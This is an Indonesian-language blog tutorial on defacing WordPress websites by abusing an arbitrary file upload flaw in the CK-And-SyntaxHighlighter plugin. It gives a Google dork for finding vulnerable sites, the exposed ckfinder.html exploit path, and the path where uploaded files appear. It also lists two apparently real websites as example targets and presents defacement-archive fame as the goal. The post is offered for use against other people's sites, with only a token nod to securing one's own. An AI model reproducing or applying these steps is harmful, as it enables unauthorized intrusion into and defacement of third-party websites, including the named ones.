Tuesday, 18 November 2014

Tutorial Deface Website With WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

Gantengers - WordPress CK-And-SyntaxHighLighter Arbitrary File Upload , Mari kita sedikit bermain-main dengan wordpress dengan berbagai bug yang tersedia kini anda bisa menguploud file berupa gambar atau file text ke dalam website berbasis wordpress tutorial kali ini hampir mirip seperti tutorial sebelumnya hanya berbeda karena tutorial sebelumnya anda bisa menguploud shell kedalam website yang memiliki bug dari plugin mereka sendiri dan kini kita bermain simple saja mungkin tutorial kali ini bisa anda manfaatkan untuk menambah list lagi kedalam web defacement directory yang sudah banyak digandrungi oleh beberapa defacer ternama seperti zone-h dark-h dan lain sebagainya.
Tutorial Deface Website With WordPress CK-And-SyntaxHighLighter Arbitrary File Upload
Berbeda dengan tutorial yang saya berikan kemarin deface wordpress dengan wp-store remote file uploud vulnerablity tutorial itu mungkin sudah banyak yang menggunakan nya khususnya adalah dork, kenapa karena semakin banyak yang menggunakan dork tersebut semakin kecil harapan kita menemukan target yang fresh ya bukan berarti tidak mungkin anda tidak akan menemukan target tapi kesempatan masih ada untuk tutorial kali ini berikut beberapa paparan mudah tutorial CK-And-SyntaxHighlighter.

WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

Bahan-Bahan nyaGoogle Dork :
inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
Exploit :
/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
Contoh Penggunaan Exploit  :
http:///www.korban.com/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
File Upload Path :
http://www.korban.com/wp-content/uploads/ckfinder/files/x.txt
Contoh Target :
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html

Tutorial Step by Step

1. Silahkan searh di google menggunaka google dork diatas seperti gambar dibawah ini lalu buka semua web yang muncul haha liatin satu satu
Tutorial Deface Website With WordPress CK-And-SyntaxHighLighter Arbitrary File Upload
2. disitu kita udah buka semua web nya sekarang saya pilih salah satu contoh saya mendapat http://www.tourgueniev.fr/ dan masukan exploit di belakang web tersebut dan akan menjadi http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html 
Nah Sekarang gunakan imajinasimu dan mulai mencari file untuk mengupload file text atau html.
4. Terakhir untuk mengakses file yang sudah lo uploud silahkan ganti url bagian belakang menjadi http://www.korban.com/wp-content/uploads/ckfinder/files/x.txt
Tutorial Deface Website With WordPress CK-And-SyntaxHighLighter Arbitrary File Upload
Catatan
www.korban.com ganti dengan url web yang kamu dapatkan
x.txt ganti dengan nama file yang kamu uploud contoh gambar.jpg atau tulisan.txt

Berikut adalah  Tutorial Deface Website With WordPress CK-And-SyntaxHighLighter Arbitrary File Upload mungkin bisa menambah pengetahuan anda di bidang it dan belajar menemukan bug di web yang anda kelola dengan memperhatikan beberapa artikel saya disini. dan jika masih kurang jelas terhadap tutorial yang saya berikan atau mau menyanggah silahkan tuliskan keluh kesah anda di kotak komentar di bagian akhir posting sekian dan terima kasih.

 
function hideNow(e) { if (e.target.id == 'ac-wrapper') document.getElementById('ac-wrapper').style.display = 'none'; }